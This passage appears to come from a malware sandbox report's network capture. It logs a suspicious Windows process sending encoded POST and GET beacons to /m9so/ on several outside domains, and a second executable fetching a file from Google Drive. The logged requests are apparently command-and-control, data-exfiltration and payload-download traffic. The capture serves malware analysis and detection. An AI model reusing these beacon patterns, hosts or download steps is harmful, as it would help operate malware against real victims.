                                                                                    Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
                                                                                    Mar 18, 2024 14:54:10.084201097 CET1286INData Raw: 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d
                                                                                    Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
                                                                                    Mar 18, 2024 14:54:10.084214926 CET1286INData Raw: 67 65 72 2e 63 6f 6d 2f 74 75 74 6f 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c
                                                                                    Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
                                                                                    Mar 18, 2024 14:54:10.084228039 CET1286INData Raw: 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                    Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
                                                                                    Mar 18, 2024 14:54:10.084252119 CET1286INData Raw: 66 6f 72 28 76 61 72 20 72 2c 65 3d 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72
                                                                                    Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}retu
                                                                                    Mar 18, 2024 14:54:10.084265947 CET1286INData Raw: 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66
                                                                                    Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
                                                                                    Mar 18, 2024 14:54:10.084275961 CET118INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70
                                                                                    Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49829 | 195.110.124.133 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:15.768569946 CET | 805 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=aiUlp15/om3uaTwKMXIoD8poMNnUk7hqAkud7PC0e2zTHnY7HkicRKqiHutbxmmC8mLQ52Hu6enp1P+Zknlzi/5KeGbdc/Z+3KbJTvprhxIviTTJtZ7mGwSX4Ys01ayPaOX3NSC4kNhkMTV3z9X/2XbVznG+3SWn6DqYQ13tHYkLnm79NdUUpxMuft5mePP0Kg==
Mar 18, 2024 14:54:15.955194950 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49830 | 195.110.124.133 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:18.470972061 CET | 1145 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:54:18.658966064 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49831 | 195.110.124.133 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:21.174032927 CET | 12860 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:54:21.728085041 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    36 | 192.168.11.20 | 49832 | 195.110.124.133 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:54:23.875360966 CET | 535 | OUT | GET /m9so/?LFPxWlV=Xg8FqCUssmOzcClrP1dUBt9Tduj8pb94TVXDuPCTJTreZhcpD3ySUs7Oc+hlxVab0la101jy3sXphv2K+D5gks93TxumRvYq05TzXtp4wx5urQWvjqWwNhA=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.guiguigohost.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:54:24.061753035 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:23 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    37 | 192.168.11.20 | 49834 | 172.67.158.92 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:54:32.207163095 CET | 534 | OUT | GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.noonartists.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:54:32.608623981 CET | 1286 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:54:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    location: https://www.noonartists.com/m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX
                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUVhh4qUtDIXe5dnpUG%2BPIqIw92fVHjbTrBX%2BxfoGOhqvcLI2%2BuyvQVJbuLydTjUqWIfC54tltexdx54AI2%2FQc8I3bp5OWeaDrTh5oh4UnIu%2FeM1Aq6XDXOcRR23D1esqLYYeCEq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b7179fc4726e-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
                                                                                    Mar 18, 2024 14:54:32.608639956 CET | 232 | IN
                                                                                    Data Ascii: <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                    Mar 18, 2024 14:54:32.608649969 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    38 | 192.168.11.20 | 49835 | 198.177.123.106 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:09.672399998 CET | 811 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:09.977924109 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:09 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    39 | 192.168.11.20 | 49836 | 198.177.123.106 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:12.378052950 CET | 1151 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:12.675719976 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:12 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    40 | 192.168.11.20 | 49837 | 198.177.123.106 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:15.083128929 CET | 3858 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:15.763619900 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    41 | 192.168.11.20 | 49838 | 198.177.123.106 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:17.783108950 CET | 537 | OUT | GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.alpinebretech.life
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:18.075850964 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:55:17 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    42 | 192.168.11.20 | 49839 | 46.30.215.63 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:23.264523029 CET | 796 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGxlExuRfVrXz3uT/77d2tLEqPfGMvF+W1pMH7h16XV+I7JZwhXl9eL64UCSTQxF9xl87bYGqgRWO3sPZhFvcmRTRwxCm9b4TDKbn1eWt7vZBzsEp8vdTXuWJ/MdXfeW6KUbxV+zF37E6TVLzDSbjXlHGchzXI/q9qgmfoVg83ifgNWNPsDgxMtg==
                                                                                    Mar 18, 2024 14:55:23.445348024 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:23 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:23 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:23 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55945926979
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    43 | 192.168.11.20 | 49840 | 46.30.215.63 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:27.140060902 CET | 1136 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:27.335293055 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:27 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:27 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55995663007
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    44 | 192.168.11.20 | 49841 | 46.30.215.63 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:55:29.842281103 CET | 2572 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:30.383697987 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:29 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:29 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55985080460
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.11.20 | 49757 | 142.251.41.14 | 443 | 9636 | C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-03-18 13:47:26 UTC | 216 | OUT | GET /uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-03-18 13:47:26 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:47:26 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
